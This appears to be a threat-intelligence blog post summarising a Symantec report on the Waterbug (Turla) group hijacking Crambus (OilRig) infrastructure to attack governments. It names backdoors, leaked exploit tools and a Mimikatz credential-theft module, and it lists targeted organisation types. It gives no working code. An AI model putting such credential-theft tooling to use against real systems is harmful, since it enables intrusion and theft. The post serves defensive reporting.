Waterbug APT Group (aka Turla) is using hijacked infrastructure of Crambus APT (aka OilRig, APT34) group to attack governments and international organizations. According to the Symantec report published on 20 Jun, 2019 Waterbug APT group has been targeting governments and International Organizations since early 2018. Waterbug targets Europe, Latin America, Middle East and South Asia.
Waterbug APT Group is targeting Governments and International Organisations in multiple (3 waves) campaigns. In the first campaign Waterbug APT group is using a backdoor named Neptune (Backdoor.Whisperer) to target Microsoft Exchange servers. Neptune is installed on Microsoft Exchange servers and can passively listen commands from attackers. Neptun also capable of downloading additional tools, upload stolen files, and execute shell commands. In the second campaign Waterbug APT group had used modified version of Meterpreter backdoor. In the third campaign Waterbug APT group uses custom RPC backdoor.
Waterbug APT group uses new tools like new custom malware, modified hacking tools etc. Symantec reports “Aside from new tools already mentioned above, Waterbug has also deployed:
1. A new custom dropper typically used to install Neptun as a service.
2. A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.
3. A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.
4. Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Waterbug command and control (C&C) servers.
5. PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs.
6. Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, and Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Waterbug tools or infrastructure. “
As per Symantec report Waterbug APT group hijacked infrastructure from the Crambus APT group. Symantec reports also states that Waterbug APT group and Crambus APT group are from different nation, they may be collaborating together. But Symantec fails to give any evidence to support this argument. During this attack campaigns Mimikatz tools was downloaded to victim’s network via Powruner tool and the Poison Frog control panel from Crambus network infrastructure.
As per Symantec believe the heavily modified Mimikatz tool belongs to the Waterbug APT group. “Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug. It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature. Waterbug has frequently made extensive modifications to publicly available tools, something Crambus is not well known for.” Symantec report.
Symantec says that Victim’s computer network was also attacked by a tool IntelliAdmin. IntelliAdmin tool was previous used by Crambus APT group. So from this we may conclude that Waterbug APT group may have hijacked the infrastructure of Crambus APT group.
Who are the targets of this campaign?
1. The Ministry of Foreign Affairs of a Latin American country
2. The Ministry of Foreign Affairs of a Middle Eastern country
3. The Ministry of Foreign Affairs of a European country
4. The Ministry of the Interior of a South Asian country
5. Two unidentified government organizations in a Middle Eastern country
6. One unidentified government organization in a Southeast Asian country
7. A government office of a South Asian country based in another country
8. An information and communications technology organization in a Middle Eastern country
9. Two information and communications technology organizations in two European countries
10. An information and communications technology organization in a South Asian country
11. A multinational organization in a Middle Eastern country
12. An educational institution in a South Asian country
Indicators of Compromise
To read the full report please visit